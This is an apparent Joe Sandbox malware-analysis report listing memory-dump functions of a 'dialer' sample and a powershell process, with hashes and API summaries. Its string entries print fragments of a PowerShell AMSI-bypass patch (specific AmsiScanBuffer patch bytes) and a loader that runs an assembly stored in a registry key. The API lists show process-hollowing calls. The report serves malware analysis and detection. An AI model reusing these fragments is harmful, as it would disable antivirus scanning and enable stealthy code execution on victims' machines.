                                                          • Instruction Fuzzy Hash: 28F01976700B4082E711CB67E88438AA7A2BBCCB80F498025DB5947729DEB4C956C740

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Heap$AddressAllocHandleModuleProcProcess
                                                          • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`dialerstager`)).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                          • API String ID: 3242894177-3709903795
                                                          • Opcode ID: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                          • Instruction ID: 14a767466f4e457cf388ac16d0af6f49bf344e7045f9ae0e12022511aa144a10
                                                          • Opcode Fuzzy Hash: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                          • Instruction Fuzzy Hash: 38416BF8284702A1FA1BEF17B8557D52365A78DBC5F846261BE0A473B69EBCC108C394

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                          • String ID: SYSTEM$dialersvc64$powershell
                                                          • API String ID: 3960698109-174983134
                                                          • Opcode ID: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                          • Instruction ID: aee36af91c86c83140a7f8fc7c4422115872d8a4c3e6ef38ff6a7da2a4766896
                                                          • Opcode Fuzzy Hash: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                          • Instruction Fuzzy Hash: 2DD1DE76604B8586EB11CF6AE8843DE67B1FB88B99F508116EF4E47B68DF39C149C700

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                          • String ID:
                                                          • API String ID: 4184240511-0
                                                          • Opcode ID: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                          • Instruction ID: 67cbc857c72eec62a5b69ac69888ab56890e3342390bd1f27bc6256027a28dd6
                                                          • Opcode Fuzzy Hash: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                          • Instruction Fuzzy Hash: 5E413972704A458AEB11CF7AE8543DD73B1FB89B99F449226AF4A47A69DF38C149C300

                                                          Control-flow Graph

                                                          Control-flow graph (rendered graph; edge list omitted). Function 140001c0c-140001c99 calls 140001070 and the APIs lstrlenW and StrStrIW.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID:
                                                          • API String ID: 1659193697-0
                                                          • Opcode ID: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                          • Instruction ID: 09bf7b72404f13f14ced639d6c0c6f67ee10a0461fa6ddbcf4aeef183f1f47ff
                                                          • Opcode Fuzzy Hash: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                          • Instruction Fuzzy Hash: 9B0116B6344B8185EA66CF13A804BA963AAF78CFC0F598131AE4D83765DF38D946C740

                                                          Control-flow Graph

                                                          Control-flow graph (rendered graph; edge list omitted). Function 140001970-14000197b calls 140001984 and then ExitProcess.
                                                          APIs
                                                            • Part of subcall function 0000000140001984: FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                            • Part of subcall function 0000000140001984: SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                            • Part of subcall function 0000000140001984: LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                            • Part of subcall function 0000000140001984: LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                            • Part of subcall function 0000000140001984: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                            • Part of subcall function 0000000140001984: RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                          • ExitProcess.KERNEL32 ref: 000000014000197B
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                          • String ID:
                                                          • API String ID: 3836967525-0
                                                          • Opcode ID: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                          • Instruction ID: 591ae2b672e41714171671f8838f177bfce947d6885aae7fa81f753db4d17b5a
                                                          • Opcode Fuzzy Hash: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                          • Instruction Fuzzy Hash: 71A011B0A00A8082EA0ABBB2282A3E802200B88380F000000A202032A2CC38008A8A00

                                                          Control-flow Graph

                                                          Control-flow graph (rendered graph; edge list omitted). Function 14000114c-140001178 calls GetModuleHandleA and, on the success path, GetProcAddress.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: RtlGetVersion$ntdll.dll
                                                          • API String ID: 1646373207-1489217083
                                                          • Opcode ID: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                          • Instruction ID: 59613ef8418529ec4bc26aae3d36b02baf67a4f8cd1ada14fad478f70e9913c3
                                                          • Opcode Fuzzy Hash: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                          • Instruction Fuzzy Hash: 8CD0E9F5622A01E1EA0BEB57FC553D512617B5C781F804521E70A43671EF3C8659C700

                                                          Execution Graph

                                                          Execution Coverage:9%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:44.4%
                                                          Total number of Nodes:27
                                                          Total number of Limit Nodes:0
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2261622068.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34740000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d517ab40b939059bbbf0a29a204777735a57863b412b51e827f736b69f00e19
                                                          • Instruction ID: dfdb07436d692e8bac719e4c970f57c2ba7daf5ca4ab364bd8ed70c413f667ac
                                                          • Opcode Fuzzy Hash: 6d517ab40b939059bbbf0a29a204777735a57863b412b51e827f736b69f00e19
                                                          • Instruction Fuzzy Hash: 2033A571A1CB858FE7759B1888956B977E0EF9A740F4505BED48CC7292CA38BC40CBC6

                                                          Control-flow Graph

                                                          Control-flow graph (rendered graph; edge list omitted). Function starting at 7ffd3467b3fb (basic blocks 7ffd3467b36b-7ffd3467b861) has no API call sites; it makes internal calls to 7ffd3467b862 and 7ffd3467b8ba.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: mM_L
                                                          • API String ID: 0-3523453553
                                                          • Opcode ID: 9a6a835f63570ead54fce95d7cb578753af74ef42b508abae94303ddb585f4dd
                                                          • Instruction ID: 31c465cf4c07d16e9ee17119de4c26425679cef21ba03b22fe34dccf0407d440
                                                          • Opcode Fuzzy Hash: 9a6a835f63570ead54fce95d7cb578753af74ef42b508abae94303ddb585f4dd
                                                          • Instruction Fuzzy Hash: 6A02F531B0CA5A8FEB54DF5CC8A5AED7BE1FF69314F14417AD509D7286CA28E842C780

                                                          Control-flow Graph (rendered image not extracted): blocks 7ffd34680c6d-7ffd34680d6a; APIs: NtWriteVirtualMemory
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 861368fcfc4aec83aa9b47dc101f0fd96d64a8d07ea3894c6622788441cead0e
                                                          • Instruction ID: 1960a880ea049957a80a0c469d4bffa5f0913bf3569c1de31a12ae2b4a953fb6
                                                          • Opcode Fuzzy Hash: 861368fcfc4aec83aa9b47dc101f0fd96d64a8d07ea3894c6622788441cead0e
                                                          • Instruction Fuzzy Hash: 2831E23190CB488FDB59DF58D885AE9BBE0FB5A321F00426ED049D3652CB74A806CB85

                                                          Control-flow Graph (rendered image not extracted): blocks 7ffd3467e0ea-7ffd34680d6a, entry block 7ffd3467e0ea falls into the 7ffd34680cfa-7ffd34680d6a body above; APIs: NtWriteVirtualMemory
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: dfa0f861bf1b0ea4a12715f0b9a2ce26a12fa36607aab4f61ca9496cb325c9c6
                                                          • Instruction ID: a91e9006856233f8efbbdb80e970b2554b6c778cf5206ea43512bc915f139a32
                                                          • Opcode Fuzzy Hash: dfa0f861bf1b0ea4a12715f0b9a2ce26a12fa36607aab4f61ca9496cb325c9c6
                                                          • Instruction Fuzzy Hash: 1B31A071A0CB1C9FDB58DF98D8856F9BBE0FB69311F00422ED04AD3652CB74A8068B85

                                                          Control-flow Graph (rendered image not extracted): blocks 7ffd34680a4e-7ffd34680b3c; APIs: NtUnmapViewOfSection
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: 94722fea928e97a0844e204931684db1ad3c943f90feba322511e32f25836497
                                                          • Instruction ID: 6082548e50ffa38c5b4cac0da0f85d52ef39a61530c004b2d99118c84910319f
                                                          • Opcode Fuzzy Hash: 94722fea928e97a0844e204931684db1ad3c943f90feba322511e32f25836497
                                                          • Instruction Fuzzy Hash: C431073090C7888FDB5ADFA8C8967E97FE0EF67320F04429BD049C71A3D664A445CB91

                                                          Control-flow Graph (rendered image not extracted): single block 7ffd3467e098-7ffd3467e0b6, no API call in the graph; APIs table not extracted
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: 3c65de9aa035ee31f62e58bfd0d063e6e746999df4ac0fdd62bcbf51f4f8653f
                                                          • Instruction ID: bd3fc71ebc2c4dca19603fcf531076dec41693e71d685d9419a3cb52e97348e7
                                                          • Opcode Fuzzy Hash: 3c65de9aa035ee31f62e58bfd0d063e6e746999df4ac0fdd62bcbf51f4f8653f
                                                          • Instruction Fuzzy Hash: 79313671A0CB488FEB58DF98C8897E97BF0EBA6320F04416FD049D3553DA64A849C751

                                                          Control-flow Graph (rendered image not extracted): blocks 7ffd34680ff4-7ffd346810d6; APIs: NtResumeThread
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: f1e97f7b45ef034c09f85d038cbe2fb3b6e699864bdc73d67839a15690050046
                                                          • Instruction ID: 79674d755005100ed7b89c85c1e6651f54cace71cce5ca45edfa3ede9483b2e0
                                                          • Opcode Fuzzy Hash: f1e97f7b45ef034c09f85d038cbe2fb3b6e699864bdc73d67839a15690050046
                                                          • Instruction Fuzzy Hash: 5A31F431A0C65C8FDB59DF98D8467EABBE1EF5A320F04416BD049D3252DB74A806CB91

                                                          Control-flow Graph (rendered image not extracted): blocks 7ffd3467e0b8-7ffd34680b3c, entry block 7ffd3467e0b8 falls into the 7ffd34680b1a-7ffd34680b3c tail of the NtUnmapViewOfSection function above; APIs: NtUnmapViewOfSection
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: af61034d8793201e925e78473d94bd07670baab1a45d0e7138afb5ea27387d60
                                                          • Instruction ID: 439afea5c3cd4cffa23e9a96d8a4cb6576c3533a0a1a978e57600a3e654008f1
                                                          • Opcode Fuzzy Hash: af61034d8793201e925e78473d94bd07670baab1a45d0e7138afb5ea27387d60
                                                          • Instruction Fuzzy Hash: 8C21B671A0CA0C8FDB58DF98D8857F97BE0EB69320F04416FD04DD3252DA74A856CB51

                                                          Control-flow Graph (rendered image not extracted): blocks 7ffd34680f30-7ffd34680fec; APIs: NtSetContextThread
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: b488fa0ea644253638193194de9da4f46eeca20c1a2fcd1f54208149b990dfe2
                                                          • Instruction ID: 8b1639de312b141d1ae4f1d926ad0f314f24c8e564699e54f3e0eec0f4166bc1
                                                          • Opcode Fuzzy Hash: b488fa0ea644253638193194de9da4f46eeca20c1a2fcd1f54208149b990dfe2
                                                          • Instruction Fuzzy Hash: 9B219131A0CA4C8FDB59DF98D84A7E97BF0EB66320F04416BD049D3252D674A846CB91

                                                          Control-flow Graph (rendered image not extracted): blocks 7ffd3467e12c-7ffd346810d6, entry block 7ffd3467e12c falls into the 7ffd346810b4-7ffd346810d6 tail of the NtResumeThread function above; APIs: NtResumeThread
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 26ef37c90c8cb01699e229e827d36436f66690a8bcf36b582f72429c475cceae
                                                          • Instruction ID: 0bdbaa6e1c92d6fb07f8ab5b7747a3125f60cca8a86ad08ec38160b4996c61bb
                                                          • Opcode Fuzzy Hash: 26ef37c90c8cb01699e229e827d36436f66690a8bcf36b582f72429c475cceae
                                                          • Instruction Fuzzy Hash: 6B219171A0CA1C8FDB58DF98D8457EABBF1EB59310F04416ED00DD3256DB70A842CB91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: 8268f9dd3394697c15827971b597fef8cd9b265da5664a4e1eee7bf8ea6abeb4
                                                          • Instruction ID: d83033160141db32e38fff2f5496a5d5aea43bb1d381ed2e8410f0a0f5c1052f
                                                          • Opcode Fuzzy Hash: 8268f9dd3394697c15827971b597fef8cd9b265da5664a4e1eee7bf8ea6abeb4
                                                          • Instruction Fuzzy Hash: 19218130A0CA0C8FEB58DF98D84A7F97BF5EB69321F00416ED44DD3256DA70A846CB91
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 727da290f0eaa9720a594c95c0ed1ffdbec7479d6f173d0d99ba9183fcd1b28b
                                                          • Instruction ID: 44603fa51e3cc90505afce4506104f76bec04ff21f21c4953cc7cfef4e82c71e
                                                          • Opcode Fuzzy Hash: 727da290f0eaa9720a594c95c0ed1ffdbec7479d6f173d0d99ba9183fcd1b28b
                                                          • Instruction Fuzzy Hash: D071F731B1CA1D4AF71CAB6898A62FD76D2EF99311F40853DE54FC31D3ED2CA8065282
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adc89536e25868ac0c62e61d4839ab039f0e4271579b5f7ccb32768caf8a1713
                                                          • Instruction ID: daa52249d2ce6761a29ac41e71bb626b9cd5b2c10c6da441f40c22490ff0ccdc
                                                          • Opcode Fuzzy Hash: adc89536e25868ac0c62e61d4839ab039f0e4271579b5f7ccb32768caf8a1713
                                                          • Instruction Fuzzy Hash: EA610931B1C6194AF758AB3498A62FE7BD2EF8A311F41853ED54FC31D3ED2D68065242
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2261622068.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34740000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6f76aec40c957ede19468613ac3dd925785bb87d29c111804e66d3dc2132899
                                                          • Instruction ID: 72c52c0610a9d17f0cbc7cedd23f7385a99f3b5cb2ed48a8059d6c44bdb8965b
                                                          • Opcode Fuzzy Hash: e6f76aec40c957ede19468613ac3dd925785bb87d29c111804e66d3dc2132899
                                                          • Instruction Fuzzy Hash: B2238271A1CB858FE775AB1888D5AB977E0EB99740F45057ED48CC7292CA38BC40CBC6

                                                          Control-flow Graph (rendered image not extracted): blocks 7ffd34680231-7ffd346809be, internal call to 7ffd346809bf; APIs: CreateProcessA
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: fdce7cf6695c8fd3f5a5ac8f9ff69565ee94eeb4f647df83f83037508749b148
                                                          • Instruction ID: ba7af9be51e098f1b537000ea0d828c3cdeb953727e692ff57d243ee4f278270
                                                          • Opcode Fuzzy Hash: fdce7cf6695c8fd3f5a5ac8f9ff69565ee94eeb4f647df83f83037508749b148
                                                          • Instruction Fuzzy Hash: C4D1293061CB898FEB64DF2CD8967E977E0FF56310F15426AD84DC7292DE78A4418B82

                                                          Control-flow Graph (rendered image not extracted): blocks 7ffd3467eb0a-7ffd3467ed26, internal call to 7ffd3467ed27; APIs: CreateFileMappingW
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateFileMapping
                                                          • String ID:
                                                          • API String ID: 524692379-0
                                                          • Opcode ID: f497ffdf0f86de950c09a3cb9d934e6279be5fde4c3dfd691e17301fdd2beea9
                                                          • Instruction ID: 280e1d802278fc54fce4b4f59583f26435afea841cbc807e844bb1b361532d3c
                                                          • Opcode Fuzzy Hash: f497ffdf0f86de950c09a3cb9d934e6279be5fde4c3dfd691e17301fdd2beea9
                                                          • Instruction Fuzzy Hash: C871D43060CA8D4FEB59DF28CC557E87FE1FB56311F1442AEE84DC7292DA78A8458782

                                                          Control-flow Graph (rendered image not extracted): blocks 7ffd3467e8bc-7ffd3467eab9, internal call to 7ffd3467eaba; APIs: CreateFileA
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: a82449b2c06afc5a74c4cadd41e132ec68b7770a7a26d4fe5689049db411166d
                                                          • Instruction ID: 56d42eb56d6f127592b756e9665b94783b6ed2d6125ad7c15c36fffe135a1463
                                                          • Opcode Fuzzy Hash: a82449b2c06afc5a74c4cadd41e132ec68b7770a7a26d4fe5689049db411166d
                                                          • Instruction Fuzzy Hash: C461C630A18A8D4FEB59EF28DC567E87BE0FB59310F10426AE84DC3252CB74A8458B81

                                                          Control-flow Graph (rendered image not extracted): blocks 7ffd3467ed76-7ffd3467ee86; APIs: MapViewOfFile
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: FileView
                                                          • String ID:
                                                          • API String ID: 3314676101-0
                                                          • Opcode ID: e8db06085cd19b74ed93f44c7b25c9b731eab1ecbf5207cb142fef4dca4c1b44
                                                          • Instruction ID: 9e95ba9c726f2cead164e631aa6d2d19a88310fb43f0409161b34700ec947ed6
                                                          • Opcode Fuzzy Hash: e8db06085cd19b74ed93f44c7b25c9b731eab1ecbf5207cb142fef4dca4c1b44
                                                          • Instruction Fuzzy Hash: BA41463190CA888FEB19DB68DC556E97FF0FF5A321F04426FD089D3192DA686806CB91

Control-flow Graph

Control-flow graph for the function at 7ffd3467e7b8 (rendered graph data omitted; legend: executed / not executed): basic blocks span 7ffd3467e7b8-7ffd3467e8b7; the block at 7ffd3467e810 calls K32GetModuleInformation.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: InformationModule
                                                          • String ID:
                                                          • API String ID: 3425974696-0
                                                          • Opcode ID: b18ab001d6f2899aea705b8e13690e4485fa296fafd0e33c03925f5df509b8f7
                                                          • Instruction ID: 6fda9890a67207b22ffb9dafef4c112cfcc98793aae7272500e414df01e61722
                                                          • Opcode Fuzzy Hash: b18ab001d6f2899aea705b8e13690e4485fa296fafd0e33c03925f5df509b8f7
                                                          • Instruction Fuzzy Hash: 1331F53190CA484FDB18DBA898496F97BE1EB66321F04426ED059D3292CB746856C781
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2267797197.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd348f0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: {'_H
                                                          • API String ID: 0-3848020189
                                                          • Opcode ID: 955b4a32ccf75d1e2fda24763104cd8187f944c528356ba49c58c52e3e7b36d3
                                                          • Instruction ID: 89817110a18761867ece7545f97754e27521a4c457791ee4fb64a24cf4633f3f
                                                          • Opcode Fuzzy Hash: 955b4a32ccf75d1e2fda24763104cd8187f944c528356ba49c58c52e3e7b36d3
                                                          • Instruction Fuzzy Hash: 1621C933B0DA194FEBA09B5C74A55F9B3D1EF94310B1802B7D54ED32A6ED1DAC165380
                                                          Strings
                                                          Memory Dump Source
